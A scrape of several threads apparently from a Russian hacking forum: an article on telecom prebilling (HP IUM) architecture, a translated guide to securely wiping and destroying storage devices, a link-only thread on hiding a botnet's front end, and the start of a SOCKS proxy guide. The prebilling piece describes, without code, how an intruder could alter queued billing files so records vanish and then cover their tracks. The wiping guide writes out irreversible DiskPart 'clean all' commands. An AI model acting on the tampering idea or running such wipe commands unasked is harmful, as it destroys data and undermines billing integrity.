Представь большую мясорубку, в которую бросают мясо, овощи, буханки хлеба — все, что только можно. То есть на входе самые разные продукты, но на выходе все они приобретают одинаковую форму. Мы можем поменять решетку и получим на выходе другую форму, но принцип и путь обработки наших продуктов останется прежний — шнек, нож, решетка. Это и есть классическая схема предбиллинга: сбор, обработка и вывод данных. В предбиллинге IUM звенья этой цепочки называются encapsulator, aggregator и datastore.

Тут необходимо понимать, что на входе у нас должна присутствовать полнота данных — некий минимальный объем информации, без которого дальнейшая обработка бесполезна. При отсутствии какого-то блока или элемента данных мы получаем ошибку или предупреждение, что обработка невозможна, так как операции не могут быть выполнены без этих данных.

Поэтому очень важно, чтобы оборудование формировало файлы-записи, которые имели бы строго определенный и установленный производителем набор и тип данных. Каждый тип оборудования — отдельный обработчик (коллектор), который работает только со своим форматом входных данных. Например, нельзя просто так взять и закинуть файл с оборудования CISCO PGW-SGW с интернет-трафиком мобильных абонентов на коллектор, который обрабатывает поток с оборудования фиксированной связи Iskratel Si3000.

Если мы так сделаем, то в лучшем случае получим исключение при обработке, а в худшем у нас встанет вся обработка конкретного потока, так как обработчик- коллектор упадет с ошибкой и будет ждать, пока мы не решим проблему с «битым» с его точки зрения файлом. Здесь можно заметить, что все системы предбиллинга, как правило, критично воспринимают данные, на обработку которых не был настроен конкретный обработчик-коллектор.

Изначально поток разобранных данных (RAW) формируется на уровне энкапсулятора и уже здесь же может быть подвергнут преобразованиям и фильтрации. Так делается, если нужно до схемы агрегации произвести с потоком изменения, которые должны быть в дальнейшем применены ко всему потоку данных (когда он будет проходить через различные схемы агрегации).

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F188490%2Fimg1.jpg&hash=5853547bd4dae7f50d47aa2f37fc2ff3)

Файлы (.cdr, .log и прочие) с записями об активности пользователей-абонентов поступают как с локальных источников, так и с удаленных (FTP, SFTP), возможны варианты работы и по другим протоколам. Разбирает файлы парсер, с помощью разных классов Java.

Так как система предбиллинга в нормальном режиме работы не предназначена для хранения истории обрабатываемых файлов (а их может быть сотни тысяч в сутки), то после обработки файл на источнике удаляется. По разным причинам файл не всегда может быть удален корректно. В результате бывает, что записи из файла обрабатываются повторно или с большим опозданием (когда удалить файл получилось). Для предотвращения таких дублей существуют механизмы защиты: проверка на дубли файлов или записей, проверка на время в записях и прочее.

Одно из самых уязвимых мест здесь — это критичность к размеру данных. Чем больше мы храним данных (в памяти, в базах данных), тем медленнее мы обрабатываем новые данные, тем больше мы потребляем ресурсов и в итоге все равно достигаем предела, после которого вынуждены удалить старые данные. Таким образом, для хранения этих метаданных обычно используются вспомогательные БД (MySQL, TimesTen, Oracle и так далее). Соответственно, получаем еще одну систему, которая влияет на работу предбиллинга с вытекающими вопросами безопасности.

Что в черном ящике?
Когда-то на заре подобных систем использовались языки, которые позволяли эффективно работать с регулярными выражениями, — таким, например, был Perl. Фактически почти весь предбиллинг, если не брать во внимание работу с внешними системами, — это правила разбора-преобразования строк. Естественно, лучше регулярных выражений тут ничего не найти. Постоянно растущий объем данных и повышение критичности к времени вывода новой услуги на рынок сделали применение таких систем невозможным, так как тестирование и внесение изменений занимало много времени, масштабируемость была низкой.

Современный предбиллинг — это набор модулей, как правило написанных на Java, которыми можно управлять в графическом интерфейсе с помощью стандартных операций копирования, вставки, перемещения, перетаскивания. Работа в этом интерфейсе проста и понятна.

Для работы в основном используется операционная система на базе Linux или Unix, реже — Windows.

Основные проблемы обычно связаны с процессом тестирования или выявления ошибок, так как данные проходят по множеству цепочек правил и обогащаются данными из других систем. Видеть, что происходит с ними на каждой стадии, не всегда удобно и понятно. Поэтому приходится искать причину, отлавливая изменения нужных переменных при помощи логов.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F188490%2Fimg2.jpg&hash=219f0a2cba995031a0dade6bbb15f130)

Слабость этой системы — ее сложность и человеческий фактор. Любое исключение провоцирует потерю данных или неправильное их формирование.

Обрабатываются данные последовательно. Если на входе у нас ошибка-исключение, которая не позволяет корректно принять и обработать данные, встает весь входной поток либо порция некорректных данных отбрасывается. Разобранный RAW- поток поступает на следующую стадию — агрегацию. Схем агрегации может быть несколько, и они изолированы друг от друга. Как если единый поток воды, поступающий в душ, пройдя через решетку лейки, разделится на разные потоки — одни толстые, другие совсем тонкие.

После агрегации данные готовы к доставке потребителю. Доставка может идти как напрямую в базы данных, так и записью в файл и отправкой его дальше либо просто записью в хранилище предбиллинга, где они будут лежать, пока его не опустошат.

После обработки на первом уровне данные могут передаваться на второй и далее. Такая лестница необходима для увеличения скорости обработки и распределения нагрузки. На второй стадии к нашему потоку данных может добавляться другой поток, смешиваться, делиться, копироваться, объединяться и так далее. Конечная стадия — это всегда доставка данных в системы, которые его потребляют.

В задачи предбиллинга не входит (и это правильно!):

мониторить, поступили и доставлены ли входные-выходные данные, — этим должны заниматься отдельные системы;

шифровать данные на любой стадии.

Далеко не весь поток поступающих данных подвергается обработке. Обрабатываются только те данные, которые нужны для работы. Тратить время на остальные нет смысла до того момента, пока они не понадобятся. Таким образом, из RAW-потока нужно брать только то, что нужно для схем агрегации. Из RAW (текстовые файлы, результаты запросов, бинарные файлы) парсится только необходимое.

Приватность
Здесь у нас полный расколбас! Начнем с того, что в задачи предбиллинга не входит защита данных в принципе. Разграничение доступа к предбиллингу нужно и возможно на разных уровнях (интерфейс управления, операционная система), но если мы заставим его заниматься шифрованием данных, то сложность и время обработки настолько увеличатся, что это будет совершенно неприемлемо и непригодно для работы биллинга.

Зачастую время от использования услуги до отображения этого факта в биллинге не должно превышать нескольких минут. Как правило, метаданные, которые нужны для обработки конкретной порции данных, хранятся в БД (MySQL, Oracle, Solid). Входные и выходные данные практически всегда лежат в директории конкретного потока-коллектора. Поэтому доступ к ним может иметь любой, кому он разрешен (например, root-пользователь).

Сама конфигурация предбиллинга с набором правил, сведениях о доступах к базам данных, FTP и прочему хранится в зашифрованном виде в файловой базе данных. Если неизвестен логин-пароль для доступа в предбиллинг, то выгрузить конфигурацию не так просто.

Любое внесение изменений в логику обработки (правила) фиксируется в лог-файл конфигурации предбиллинга (кто, когда и что менял).

Даже если внутри предбиллинга данные передаются по цепочкам обработчиков- коллекторов напрямую (минуя выгрузку в файл), данные все равно временно хранятся в виде файла в директории обработчика, и при желании к нему можно получить доступ.

Данные, которые проходят обработку на предбиллинге, обезличены: они не содержат ФИО, адресов и паспортных данных. Поэтому даже если ты получишь доступ к этой информации, то персональных данных абонента отсюда не узнать. Зато можно поймать какую-то инфу по конкретному номеру, IP либо другому идентификатору.

Имея доступ к конфигурации предбиллинга, ты получаешь данные для доступа ко всем смежным системам, с которыми он работает. Как правило, доступ к ним ограничен непосредственно с сервера, на котором работает предбиллинг, но так бывает не всегда.

Если ты доберешься до директорий, где хранятся файловые данные обработчиков, то сможешь вносить изменения в эти файлы, которые ждут своей отправки потребителям. Часто это самые обычные текстовые документы. Тогда картина такая: предбиллинг данные принял и обработал, но в конечную систему они не пришли — пропали в «черной дыре».

И выяснить причину этих потерь будет сложно, так как потеряна только часть данных. В любом случае эмулировать потерю будет невозможно при дальнейшем поиске причин. Можно посмотреть данные на входе и выходе, но понять, куда они делись, не получится. Злоумышленнику при этом остается только замести следы в операционной системе.

(с) CuboZoa

Как безопасно избавиться от своих электронных устройств

ID: 676533bbb4103b69df371d96
Thread ID: 26630
Created: 2018-11-23T19:08:38+0000
Last Post: 2018-11-23T19:08:38+0000
Author: tabac
Replies: 0 Views: 1K

Как освободить ящик от старых телефонов, ноутбуков и жёстких дисков, не беспокоясь по поводу того, что ваши данные попадут кому-то в руки
Быстрое развитие технологий в последние годы напрямую влияет на продолжительность жизни пользовательской электроники. Укорачивать жизненный цикл продуктов производителей устройств вынуждают не только экономические причины, но и энтузиасты технологий, желающие иметь самые последние и крутые гаджеты.

Замена телефонов и ноутбуков раз в пару лет увеличивает риски, связанные с личными данными и безопасностью потребителей, поскольку многие из них не стирают со своих устройств данные должным образом перед тем, как продать или выбросить их. И не стоит излишне винить их в этом, поскольку безопасно стереть данные с современных устройств – задача не такая простая, как может показаться.

Продолжайте читать, если хотите узнать, почему это так, и как шифрование может помочь уменьшит эти риски. А также что лучше – продать старые устройства или просто уничтожить?

Какова ваша оценка угрозы?

Чтобы решить, как избавиться от ноутбука, телефона или накопителя, не рискуя скомпрометировать хранящиеся данные, необходимо разобраться, кому может быть интересна эта информация и на какие ухищрения они готовы будут пойти.

Рекомендации данной статьи направлены на пользователей, желающих защитить свои данные от типичных киберпреступников или любопытных покупателей. У подобных индивидов вряд ли будут ресурсы, навыки и интерес для того, чтобы попытаться провести сложные и затратные по времени процедуры восстановления данных. Затраты просто не будут стоить результатов.

Очистка данных нужна для уменьшения рисков: какова ценность данных, которые вы пытаетесь уничтожить, и каковы ресурсы того, кто может попытаться получить к ним доступ?

«Для большинства пользователей, вероятно, достаточно будет убедиться, что они не представляют слишком лёгкой добычи; что затраты на попытку восстановления данных окажутся гораздо больше ценности данных, и устройство гораздо проще будет продать на запчасти или вернуть в строй», — сказал Грег Андрзежевский [Greg Andrzejewski], директор исследований и развития компании Gillware, занимающейся восстановлением данных, услугами которых пользуются Dell, Western Digital, и другие технологические компании.

С другой стороны, в случае политических активистов, действующих в условиях репрессий со стороны правительства, или директоров крупных корпораций, ресурсы и мотивация людей, которые могут нацелиться на их данные будут сильно отличаться от того, с чем столкнётся обычный потребитель. В подобных случаях лучше не продавать старые устройства и не отдавать их в центры повторной переработки, которые могут восстановить их и снова ввести в строй.

«Пользователь должен решить: что может случиться плохого, если кто-то получит доступ к части моих данных?» – сказал Нэйтан Литл, директор разработки продукта в Gillware Forensics, подразделении Gillware, занимающемся цифровыми судебными расследованиями. «Стоит ли продавать телефон за $50 или безопаснее будет хранить его или физически уничтожить и выбросить?»

Шифрование

Перед тем, как обсудить уничтожение данных, необходимо поговорить о шифровании, поскольку лучшим способом минимизировать риски, связанные с личными данными при продаже ноутбука, мобильного телефона, другого вычислительного устройства будет включить шифрование дисков или хранилищ в начале использования устройств.

Это гарантирует, что даже если на устройстве сохранятся остатки данных, когда вы будете от него избавляться, они окажутся бесполезными для человека, у которого не будет кода шифрования или пароля, раскрывающего этот код. И, конечно, шифрование защитит ваши данные в случае кражи или утери устройства.

Все основные ОС поддерживают полное шифрование диска. У MacOS есть FileVault, у Linux есть LUKS (Linux Unified Key Setup-on-disk-format), у Windows есть BitLocker в версиях Pro и Enterprise, и ограниченная версия Device Encryption в Windows Home, если у устройства есть специальный крипточип Trusted Platform Module (TPM) 2.0. Есть и сторонние продукты с открытым кодом типа VeraCrypt, умеющие шифровать внешние диски и основные диски, на которых работает ОС.

Некоторые из этих решений шифруют основной ключ шифрования при помощи пароля пользователя, с которым он входит в систему, или при помощи отдельного пароля, который надо ввести при загрузке, и хранят его в особом месте диска. Поэтому важно использовать длинные кодовые фразы, до которых трудно догадаться, и которые нельзя легко взломать при помощи методов перебора.

Также это значит, что вам всё равно придётся очищать диск перед продажей или переработкой. Это поможет гарантировать, что хранящийся на диске ключ шифрования, защищённый паролем, будет удалён, а данные – потеряны навсегда.

Некоторые устройства хранения обеспечивают автоматическое шифрование при помощи особых чипов и прошивок, и шифруют данные перед их записью на диск. Однако такие варианты шифрования не имеют исходного кода и не публикуют документацию, поэтому сложно узнать, работают ли они правильно.

В исследовании от 2015 года нескольких внешних жёстких дисков от Western Digital, обеспечивающих шифрование, было выявлено несколько серьёзных недостатков, которые могли бы позволить атакующему восстановить данные или ключи шифрования. В дисках использовались контроллеры USB моста, занимающиеся шифрованием, произведённые другими компаниями – поэтому эта проблема не ограничивается единственным производителем.

Вывод такой: даже если у вас диск с обеспечением шифрования, всё равно может быть хорошей идеей использовать другое шифрование поверх имеющегося. Системы шифрования современных ОС широко используются и изучались многими специалистами по безопасности в течение нескольких лет. VeraCrypt, ответвление заброшенного ныне проекта TrueCrypt, также был проверен специалистами по безопасности.

Даже если вы только что осознали важность шифрования дисков, не поздно включить его прямо сейчас. Чем быстрее вы его включите, тем меньше вероятность того, что кто-то сможет восстановить данные с вашего устройства после того, как вы его продали или отнесли на утилизацию.

Убедитесь в том, что вы храните ключи восстановления от вашего шифровальщика в надёжном месте, а также регулярно делаете резервные копии важных файлов, предпочтительно на отдельный зашифрованный диск. Если ваш диск сломается до того, как вы от него избавитесь, ни одна компания не поможет вам восстановить данные, если у вас не будет ключей восстановления для зашифрованных разделов.

Стираем данные с жёстких дисков

Жёсткие диски хранят данные на вращающихся дисках, покрытых магнитным материалом. Они были стандартным типом накопителя в компьютерной индустрии уже много десятилетий, и хорошо известны, поэтому для них существует множество методов очистки, то есть, безопасного удаления данных.

В спецификации ATA – стандартном интерфейсе коммуникаций между компьютером и диском – есть даже команда SECURITY ERASE UNIT, больше известная, как Secure Erase [безопасное удаление], которую могут реализовать производители жёстких дисков и твердотельных накопителей (SSD). Выполнение команды Secure Erase на HDD или SSD уничтожит данные во всех ячейках, и вернёт диск в заводское состояние.

Windows

Сначала надо отметить, что быстрое форматирование, предлагаемое по умолчанию в ОС Windows, не уничтожает всех данных. Оно лишь очищает файловую систему, индекс записей, где хранится информация о файлах и их физическом расположении на диске. Быстрое форматирование помечает физические места как свободное пространство, доступное для повторного использования, но старые данные останутся на физических секторах, пока не будут медленно перезаписаны в будущем другими программами. Поэтому быстрое форматирование нельзя считать очисткой данных для устройств, от которых собираются избавляться.

Microsoft предлагает возможность перезаписать все сектора диска нулями, из-за чего восстановить полезные данные будет практически невозможно, или, по крайней мере, коммерчески невыгодно для фирм, занимающихся восстановлением. Это работа утилиты командной строки DiskPart и её опция «clean all».

Чтобы использовать DiskPart на основном диске, где установлена ОС, необходимо загрузиться с [установочных носителей](https://support.microsoft.com/en- us/help/15088/windows-create-installation-media) Windows (CD или флэшки) и войти в [режим восстановления](https://support.microsoft.com/en- us/help/4026030/how-to-use-windows-recovery-environment-winre-to-troubleshoot- common-s). После этого нужно выбрать командную строку и ввести “diskpart”.

Команда “list disk” выведет список всех доступных дисков с номерами (0, 1, и так далее), их определяющими. Определив диск, который вы хотите стереть, введите “select disk #”, где # обозначает номер диска. Затем введите “clean all” и запаситесь терпением, поскольку эта операция может занять очень долго.

Убедитесь в том, что вы выбрали правильный диск, поскольку эта операция необратима. Также отметьте, что выполнение одной команды clean, без параметра all, уничтожит только первый сектор диска, содержащий информацию о разделах, но не перезапишет все сектора нулями.

Производители HDD выпускают свои, специальные диагностические программы, например, [Seagate SeaTools](http://knowledge.seagate.com/articles/en_US/FAQ/201271en?language=en_US&key=ka030000000tqPHAAY&kb=n&wwwlocale=en- gb) или Western Digital Data Lifeguard Diagnostics, которые умеют безопасно стирать данные, заполняя диски нулями.

Такие утилиты от производителей обычно бывают в двух вариантах – для установки и запуска в Windows, и для запуска в DOS, при загрузке с загрузочного CD или флэшки. Для стирания диска, содержащего ОС, требуется последний вариант, поскольку нельзя стереть HDD изнутри ОС, работающей с него.

Для создания загрузочных CD или флэшек и записи на них этих утилит придётся следовать инструкциям, приложенным к этим утилитам. Однако есть путь проще: существуют загрузочные CD, поддерживаемые сообществом энтузиастов, на которых уже записаны наборы программ для восстановления, администрирования и диагностики, включая и утилиты от производителей HDD, которые в наше время иногда бывает сложно достать, поскольку некоторых производителей купили другие, после чего их старые сайты и ссылки для скачивания перестали работать.

Один из примеров – активно обновляемый проект Ultimate Boot CD (UBCD), и его можно записать на USB такими программами, как Rufus или Universal USB Installer. В нём также можно найти популярную стороннюю программу для стирания данных Darik's Boot and Nuke (DBAN), поддерживающую более сложные процедуры удаления данных – например те, что указаны в инструкциях по очистке от Министерства обороны США и других правительственных агентств.

Эти стандарты требуют стирания чувствительной информации, например, конфиденциальных данных, посредством перезаписи всего диска в несколько проходов и при помощи разных последовательностей данных, но это может занять очень много времени, и скорее всего, будет перебором для обычного пользователя.

MacOS

Программа Disk Utility в MacOS (бывш. OS X) обеспечивает несколько вариантов стирания данных с диска в разделе Security Options, включая перезаписывание в несколько проходов, удовлетворяющее спецификации DoD 5220.22-M.

В MacOS её можно найти в разделе /Applications/Utilities/ и использовать для стирания внешних дисков. Чтобы очистить диск с загрузочным томом системы, пользователи могут загрузиться в [Recovery mode](https://support.apple.com/en- us/HT201314) и запустить программу оттуда. Для SSD безопасного стирания не предусмотрено.

Solid-state drives (SSD)

Во многих современных ноутбуках, например MacBook или ультрабуки под Windows, твердотельные накопители заменяют привычные HDD, из-за чего наша задача немного усложняется. Эти накопители хранят данные не на магнитных дисках, а на чипах флэш-памяти, и используют сложные алгоритмы управления хранилищем, из-за которого традиционные методы стирания и заполнения нулями становятся менее надёжными.

У SSD существует внутренняя таблица, ставящие в соответствие логические блоки адресов (LBA) страницам, или рядам физических ячеек в чипе памяти. Блок может состоять из нескольких страниц, вплоть до 256 штук.

Когда приложению нужно перезаписать существующие данные, SSD не обновляет те же самые физические страницы. Он записывает новые данные на пустые страницы, поскольку это быстрее, а также выравнивает износ ячеек памяти. Затем таблица LBA обновляется, чтобы программы видели новую версию данных на том же месте, что и ранее.

Из-за этого трюка старые версии данных остаются нетронутыми на страницах, которые помечаются, как «ранее использованные» [stale]. Их в итоге очистят, когда другие страницы в том же блоке окажутся использованными, или когда данные с них намеренно перенесут на пустые страницы в других блоках.

Этот процесс называется сборкой мусора и необходимо для того, чтобы можно было стирать целые блоки и заново пускать их в работу. Это также одна из причин, по которой у SSD есть запасы лишних пустых блоков, и почему была введена команда TRIM, позволяющая ОС сообщить SSD о неправильно работающих страницах.

Windows

Для большинства потребителей простейшим решением для стирания SSD будет определить его производителя и модель, а затем использовать утилиту, предоставленную производителем, которая запустит внутреннюю процедуру безопасного удаления ([Intel](https://www.intel.com/content/www/us/en/support/articles/000006011/memory- and-storage.html), Samsung, Toshiba OCZ, SanDisk, Kingston, Crucial, Western Digital, Seagate, Corsair, Plextor). Как и в случае с HDD, данную процедуру необходимо запускать вне ОС, и выполнять её будет прошивка.

Большая часть приложений для работы с SSD требует установки под Windows, после чего предлагается создать загрузочный USB с программой, которая безопасно уничтожит данные.

Среди программ сторонних производителей, дающих команду ATA Secure Erase для HDD и SSD есть Parted Magic, когда-то бесплатная программа для управления разделами, за которую теперь просят $11, и HDDerase, утилита для DOS, изначально разработанная в Центре исследований памяти и записей при Калифорнийском университете в Сан-Диего, однако, не обновлявшаяся в 2008 года, в результате чего она может не работать с современными приводами.

На упомянутом выше Ultimate Boot CD присутствует HDDerase и последняя бесплатная версия Parted Magic от 2013. Parted Magic лучше, она предлагает графический интерфейс, однако у последней бесплатной версии есть некоторые известные проблемы, из-за которых приводы могут превратиться в кирпич – эти проблемы были исправлены только в более поздних версиях. Также для ATA Secure Erase можно использовать утилиту hdparm для Linux, однако её использование – дело довольно кропотливое.

Важно помнить, что при использовании команды ATA Secure Erase нужно задать пароль для диска. Выбирайте что-то простое, что легко запомнить, и не используйте пустой пароль, поскольку некоторые BIOS не распознают такие пароли и не дадут вам использовать диск в дальнейшем.

Также не рекомендуется запускать безопасное стирание внешних дисков, подключаемых по USB, поскольку некоторые из интерфейсов могут не поддерживать эту команду, и некоторые люди сообщали о превращении внешних приводов в кирпич.

Альтернативой безопасному стиранию может быть многократная перезапись SSD, но такая операция может занять несколько часов или даже дней, в зависимости от размера привода, и не всегда надёжна. Также существует риск отказы диска из-за перегрузки.

MacOS

Варианты безопасного стирания HDD от macOS Disk Utility не подходят для SSD. У Apple в документации сказано, что эти варианты «для SSD не нужны, поскольку стандартное стирание затрудняет восстановление данных с SSD».

Однако затруднительно – не значит невозможно, поэтому компания рекомендует включать шифрование FileVault в начале использования SSD.

Подводные камни

Использование инструментов для стирания данных, предлагаемых производителями накопителей, и особенно выполнение команды Secure Erase, будет наиболее безопасным вариантом, поскольку эти компании лучше всего должны знать, как работают их продукты. Однако за годы использования этих программ было набрано несколько сообщений об их неправильной работе.

В 2011 году исследователи из Калифорнийского университета в Сан-Диего решили изучить эффективность распространённых техник по очистке данных на SSD и обнаружили серьёзные проблемы с реализацией команды ATA Secure Erase. Из 12 проверенных SSD от различных производителей поддерживали эту команду лишь 8, и только 4 выполняли её надёжным способом.

На двух из этих накопителей попытки выполнить команду возвращали ошибку, а удалялся только первый блок. Что ещё хуже, один диск сообщил об успешном выполнении команды, не стерев вообще ничего.

Исследование также обнаружило, что полная двукратная перезапись SSD позволила достаточно неплохо очистить большую часть, но не все накопители. К примеру, исследователям удалось восстановить гигабайт данных, или 1% с одного из проверенных накопителей даже после 20 перезаписей, с использованием специального оборудования, соединяемого непосредственно с чипами памяти.

Пофайловая очистка, обычно работавшая для HDD, в процессе которой физическое местоположение файла многократно перезаписывалось случайными данными, оказалась полностью непригодной для SSD. Исследователи смогли восстановить от 4% до 75% содержимого файлов, якобы очищенных таким методом.

Стивен Свансон, директор лаборатории NVM Калифорнийского университета и один из исследователей, принимавших участие в работе, рассказали мне, что с 2011 года положение должно было улучшиться, в частности потому, что их работа привлекла много внимания в своё время и оказала на производителей SSD давление. Он считает, что современные SSD от уважаемых производителей должны обладать нормальными реализациями команды очистки.

«Я бы доверил программе от уважаемой компании задачу по очистке своего SSD перед продажей», — сказал он.

После удаления можно использовать live-Linux для проверки того, что на высоком уровне на накопителе больше не осталось полезных данных. Какие-то небольшие остатки данных могут существовать в чипах памяти, и в таком тесте будут не видны, но они вряд ли пригодятся киберпреступникам.

Для извлечения подобной информации потребовалось бы специальное оборудование, способное считывать информацию с флэш-чипов в обход контроллера SSD, а такую операцию любопытный покупатель или случайный киберпреступник проводить не будет.

Другая проблема состоит в том, что SSD иногда без предупреждения отказывают, причём не из-за износа ячеек памяти, который со временем случается у всех накопителей. Различные эксперты, проводившие тщательную проверку SSD, рассказывали мне, что встречали ситуации, в которых SSD просто переставали работать, и их приходилось выбрасывать.

«У них внутри есть куча электронных компонентов, — сказал Свансон. – Работающее в SSD ПО очень сложное, и если оно оказывается в плохом состоянии, сделать ничего уже нельзя и SSD просто останавливается. Такой отказ гораздо более вероятен, чем отказ флэш-чипов».

Рутгер Плак, главный эксперт судебной экспертизы из голландской фирмы Fox-IT, рассказал мне, что они с коллегами проводили некоторые проверки со стиранием SSD, чтобы узнать, можно ли их использовать для своей работы вместо HDD – к примеру, для сбора свидетельств с компьютеров пользователей во время судебных мероприятий и расследования происшествий. Они решили отклонить эту идею из-за проблем с надёжностью.

Целью было посмотреть, можно ли восстановить данные после стандартной перезаписи в несколько проходов, которую часто используют для очистки дисков, сказал Плак. «Многие SSD ломались, когда мы пытались их безопасно стирать или записывать на них слишком много данных».

Мобильные устройства

С мобильными устройствами всё в каком-то смысле проще, хотя они также используют флэш-память с теми же недостатками процедур очистки, что и у SSD.

Последние версии Android и iOS поддерживают шифрование всего устройство, многие включают его по умолчанию, однако это довольно новая тенденция, и пока ещё активно используется большое количество незашифрованных телефонов, особенно в экосистеме Android.

Стирание данных в Android

У Android есть возможность возврата к заводским настройкам, стирающая раздел данных, содержащих чувствительную информацию, и настройки приложений и ОС. У телефонов с поддержкой внешних карт microSD имеется возможность стирать и форматировать внешнее хранилище [а также шифровать / прим. перев.].

Безопасно стирать данные со старых устройств на Android, не поддерживающих полное шифрование, довольно проблематично, как показано в исследовании от 2015 года, проведённом специалистами Кембриджского университета. Они анализировали эффективность реализации функции возврата к заводским настройкам в 21 б/у телефоне с версиями Android от 2.3 до 4.3, и обнаружили, что могут восстановить электронные письма, текстовые сообщения, ключи для доступа к Google и другие чувствительные данные.

Базовое полное шифрование было добавлено в Android 4.4, и улучшено в Android 5.0. Однако включать его по умолчанию было не обязательно вплоть до версии 6.0, и даже тогда это требование применялось только к новым устройствам, идущим в комплекте с этой версией, а не к старым телефонам, получившим обновление ПО.

К самым недорогим устройствам, не поддерживающим скорость Advanced Encryption Standard (AES) на уровне выше 50 Мбит/с, не относятся требования по обязательному шифрованию, даже в последней версии Android 8.1. Согласно статистике, только у 68% телефонов, заходивших в Google Play в течение 7 дней этого июля, была установлена Android версии 6.0 или новее.

Рутгер Плак сказал мне, что за годы существования компании они получали много сообщений от людей, запустивших возврат к заводским настройкам устройств под Android, продавших их, а затем обнаруживших кражу их личной информации.

Если не использующий шифрование телефон под Android запускает возврат к заводским настройкам, и у вас есть доступ к его чипу или карте, то восстановить данные очень просто, сказал Плак. «В интернете полно софта для восстановления данных с простым интерфейсом, и оно очень полезно для восстановления случайно удалённых файлов. Однако, с точки зрения людей, продающих телефон, и ничего не подозревающих, это довольно страшно».

«Боюсь, что если у вас старый Android-телефон, то я бы не рекомендовал его продавать», — сказал мне Росс Андерсон, профессор инженерной безопасности из Компьютерной лаборатории при Кембриджском университете. «Вам нужно хорошо разбираться в вопросе стирания данных, поскольку возврат к заводским настройкам часто не работает, как надо».

Плак согласился, что продажа устройства на Android – плохая идея, и что использование полного шифрования – лучший способ предотвратить восстановление данных для новых устройств. Он также указал, что важно ставить надёжный пароль на устройство, поскольку безопасность даже зашифрованных данных зависит от него.

Очистка данных на iOS

Apple, как единственный производитель устройств с iOS, полностью контролирует эту экосистему и хорошо обновляет пользователей iPhone и iPad до последних версий ОС. Компания добавила полное шифрование устройства в iOS 8, и по умолчанию оно включено. Также, начиная с iPhone 5S, у устройств есть сопроцессор безопасности Secure Enclave, обрабатывающий криптографические операции и хранящий ключ шифрования.

Этот выделенный процессор предупреждает атаки грубой силы на пароль телефона, увеличивая задержку ввода после каждого неудачного ввода пароля. Существуют устройства, продающиеся правоохранительным агентствам, которые якобы умеют взламывать 6-значные пароли в срок до трёх дней, поэтому пользователям стоит рассмотреть применение [длинных буквенно-цифровых паролей](https://motherboard.vice.com/en_us/article/59jq8a/how-to-make-a- secure-iphone-passcode-6-digits).

Все устройства iOS можно привести в заводское состояние, подсоединив их к компьютеру и [использовав Apple iTunes](https://support.apple.com/en- us/HT201252). Также их можно стереть без компьютера, через меню Settings > General > Reset menu.

Физическое уничтожение

Если мобильный телефон, жёсткий диск или SSD содержат очень чувствительные данные, лучше всего будет их не продавать. Лучшим выбором будет хранить их в безопасном месте, из которого их нельзя украсть, или тщательно уничтожить так, чтобы данные нельзя было восстановить.

Существуют предприятия, специализирующиеся на уничтожении устройств хранения информации, некоторые из которых даже предоставляют сертификаты об уничтожении, однако их услуги направлены на корпорации и могут стоить довольно дорого.

Уничтожить HDD довольно просто. Можно просверлить сквозные отверстия или забить несколько гвоздей в корпус, что повредит диски. Конечно, во время таких операций всегда необходимо использовать защиту.

Нэйтан Литтл из Gillware сказал, что сверление отверстий, сгибание дисков или их раскалывание на кусочки можно считать весьма успешными методами уничтожения HDD.

«Данные не смогут восстановить ни в одной коммерческой лаборатории», — сказал коллега Литтла, Грег Андрзежевский. «В теории можно что-то будет прочитать при помощи очень специализированного оборудования, типа сканирующего электронного микроскопа, но коммерческие лаборатории, как мы, пытаются чинить диски. Мы не сможем ничего восстановить с HDD, диски которого достаточно сильно повреждены».

У SSD есть несколько чипов памяти, и их всех необходимо уничтожить, чтобы данные восстановить было нельзя. У обычного 2.5" SATA SSD есть защитный корпус, который надо снять, чтобы раздавить каждый чип. У SSD форм-фактора M.2 все чипы на виду, и их уничтожить легче.

Хотя может показаться, что с телефонами всё проще, на самом деле они потребуют больше усилий, поскольку чипы хранения интегрированы в их платы, и хорошо защищены. Чтобы добраться до них, придётся разобрать устройство – это кропотливый процесс, детали которого разнятся от одной модели к другой.

Современные телефоны достаточно прочны, поэтому использовать огонь для их уничтожения, как рекомендуют некоторые, будет плохой идеей. Сначала их всё равно нужно разобрать и удалить встроенные аккумуляторы, поскольку их сжигать опасно – возможен риск взрыва. Во-вторых, для повреждения внутренних компонентов потребуется очень горячее и мощное пламя.

«У нас был случай, когда телефон вместе с телом сгорел в бочке, и телефон расплавился до неузнаваемости – сложно было сказать, телефон это или бумажник, — сказал Литтл. – Это был огрызок телефона, и мы всё равно смогли вытащить чип и частично прочесть его, определить, чей это был телефон, и считать с него текстовые сообщения и изображения».

Альтернативой стиранию данных будет «физическое уничтожение устройства, тщательное раздробление до такой степени, чтобы корпуса чипов были разбиты на части, — сказал мне Росс Андерсон. – Ещё одной альтернативой будет поместить телефон в морскую воду на большую глубину, или закопать его там, где его не найдут».

Но разбить телефон в металлическом корпусе молотком будет довольно сложно. Если вы решите сделать это, рекомендуется сначала удалить аккумулятор, поэтому вам всё равно придётся сначала вскрывать корпус телефона.

источник: habr.com

прячем морду бот-сети

ID: 676533bbb4103b69df371d9b
Thread ID: 26173
Created: 2018-10-03T13:04:36+0000
Last Post: 2018-10-09T16:37:47+0000
Author: xrahitel
Replies: 1 Views: 1K

and here where the magik happen ---> тыц и тыц :lol2:

Ставим Socks своими руками

ID: 676533bbb4103b69df371d9c
Thread ID: 26197
Created: 2018-10-04T14:16:21+0000
Last Post: 2018-10-04T14:16:21+0000
Author: XSSBot
Prefix: Статья
Replies: 0 Views: 1K

Инструкция по установке носков в винде. Вы наверно не раз сталкивались с необходимостью сделать своё пребывание в сети анонимным. Вы наверное уже знаете что наиболее простым и дешевым способом анонимизировать себя в сети является работа через прокси сервер/ы. И каждый более-менее заботящийся о своей безопасности юзер работает через прокси. Рассказывать что такое прокси и какие они бывают я не буду.

